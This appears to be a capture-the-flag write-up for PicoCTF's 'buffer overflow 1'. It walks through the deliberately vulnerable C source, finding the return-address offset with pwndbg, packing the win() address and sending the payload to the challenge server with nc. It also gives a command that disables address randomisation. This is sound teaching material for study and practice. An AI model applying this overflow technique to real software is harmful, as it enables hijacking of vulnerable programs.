PicoCTF - Binary Exploitation 1

How to exploit a binary by overwriting the instruction pointer

Introduction

This post will reveal the steps in completing a basic capture the flag challenged located at Pico CTF. The challenge is named 'buffer overflow 1' and is of medium difficulty.


First steps

Once the binary and source code has been downloaded, we need to first understand how the program works. We first execute the program after providing it with executable permissions:

chmod u+x vuln

Executing the program outputs this:

$ ./vuln
Please enter your string:

We provide the prompt some input:

$ ./vuln
Please enter your string:
hello friend

Okay, time to return... Fingers Crossed... Jumping to 0x804932f

This looks like a memory address. Interesting. We'll keep this in mind.


Moving on

Now we need to take a look at file's metadata. We can do this using file and checksec.

vuln: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=685b06b911b19065f27c2d369c18ed09fbadb543, for GNU/Linux 3.2.0, not stripped

Here we can see that it is a 32-bit binary, that's dynamically linked. And most importantly for us, it is not stripped, meaning we can see the symbols (the names of functions, for example).

For checksec, I have set the format to csv, just so it's easier to comprehend.

Partial RELRO, No Canary found, NX disabled, No PIE

Great! It seems the binary is not sheilded by any protections. Here's what some of these protections do:

  • Stack Canaries: These values or 'canaries' are used to detect and prevent attacks like buffer overflows. Simply put, these values are placed between important data like return addresses. If overwritten, (if a buffer is overflowed and overwrites the canary), the programs halts execution; stopping any malicious activity from occuring.

  • NX: The No-Execute bit marks imperitive areas of memory (like the stack) as non-executable, this ensures that injected code or shellcode doesn't run.

  • PIE: Position Independent Executable ensures that the binary is loaded at random memory addresses everytime the binary is executed. Typically, however, the memory offset will remain the same, but this makes it harder to hardcode memory address in exploit scripts due to PIE.

Note PIE can be turned off on Linux systems via this command:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Don't turn this off on your main system. If you want to test it, use a virtual machine.


Back to it

So we know the binary can be easily exploited because of the lack of defensive systems. Let's take a look at the source code and see what this program does:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFSIZE 32
#define FLAGSIZE 64

void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);

  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}

We can see that there are three functions. Two things should be jumping out at you. Firstly, gets is being used to gain input. This is great for us, but not for security. Never used gets. It doesn't check the input length and whether it exceeds the allocated buffer. This means input larger than the buffer can overwrite other important areas of memory, included registers like the instruction pointer. So?

If we can control the instruction pointer (EIP) on 32-bit systems, we can control the program and tell it where to go and what to execute next.

Secondly, there is a win() function, but it's never called by either main() or vuln(), but we still need to call it. We know now how to exploit this program.


Exploitation

To exploit this binary, we first need to know how many characters it takes until the EIP is overflown. We can do this using gdb. I'll be using pwndbg (linked here) which comes with some extra features like cyclic, which is quite handy, as we'll see.

Step 1 Let's load the program in pwndbg and see how many characters it takes to overload the EIP. We can create a pattern of characters, which will help us identify at the offset. We know the buffer length is 32, by looking at the constant in the source code. Let's create a cyclic pattern of 50:

pwndbg> cyclic 50
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama

Step 2 Let's run the program and use this as input. We should get a segmentation fault, but we should also get some very useful information.

pwndbg> r
Starting program: /home/kali/Downloads/re/bufferoverflow1/vuln 
warning: Unable to find libthread_db matching inferior's thread library, thread debugging will not be available.
Please enter your string: 
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
Okay, time to return... Fingers Crossed... Jumping to 0x6161616c

Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
LEGEND: STACK | HEAP |

As expected, we received a SEG fault. Let's take a look at the EIP.

 EAX  0x41
 EBX  0x6161616a ('jaaa')
 ECX  0
 EDX  0
 EDI  0xf7ffcb60 (_rtld_global_ro) β—‚β€” 0
 ESI  0x8049350 (__libc_csu_init) β—‚β€” endbr32 
 EBP  0x6161616b ('kaaa')
 ESP  0xffffd240 β—‚β€” 0xf700616d /* 'ma' */
 EIP  0x6161616c ('laaa')
──────────────────────────

Great! As we can see our input made its way into the EIP, overwriting with our data. We need to find how many characters it took. Luckily, pwndbg has a handy built-in for this.

pwndbg> cyclic -l laaa
Finding cyclic pattern of 4 bytes: b'laaa' (hex: 0x6c616161)
Found at offset 44

Using cyclic -l we can lookup the pattern. We see our offset as 44.

Step 3 Now we need to find the memory address of the win() function. Why? So we can tell the EIP to execute this function, when we overflow it with our data. We can find the memory address like this:

pwndbg> disas win
Dump of assembler code for function win:
   0x080491f6 <+0>:     endbr32
   0x080491fa <+4>:     push   ebp
   0x080491fb <+5>:     mov    ebp,esp
   0x080491fd <+7>:     push   ebx
   0x080491fe <+8>:     sub    esp,0x54
   0x08049201 <+11>:    call   0x8049130 <__x86.get_pc_thunk.bx>

Using disas win, we can disassemble the function into its assembly equivalent. We see now why having the symbols and the memory addresses makes our lives so much easier. I haven't shown the entirety of the win() function, as we only need the first line, particularly, the memory address: 0x080491f6

Step 4 We now have the offset and the memory address. We just need to put it all together. However, we first need to ensure the program can read the memory address properly. To do so, we must convert it to the little endian format, which is used for 32-bit programs. Thankfully, pwntools has a handy function for this, in python:

import pwn 
import pwnlib 

>>> print(pwn.p32(0x080491f6))
b'\xf6\x91\x04\x08'

Here, we have our bytes! b'\xf6\x91\x04\x08'

Step 5 Now all we need to do, is send this data as input to the PicoCTF server. However, we first need to ensure that we create a byte string with the offset so it works correctly.

>>> offset=44
>>> print(b"A" * offset + b'\xf6\x91\x04\x08')
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08'

We don't actually need the b at the start (which means bytes in python). Using the server and port provided by PicoCTF, we can simply send the response via nc:

➜ echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08\' | nc saturn.picoctf.net 55210 
Please enter your string: 
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{addr3ss3s_REDACTED}                      

And you should get your flag!


Conclusion

This challenge was fairly simple, but it teaches you about what certain permissions and binaries do, and how controlling the instruction pointer means we have entire control over the program.

Last updated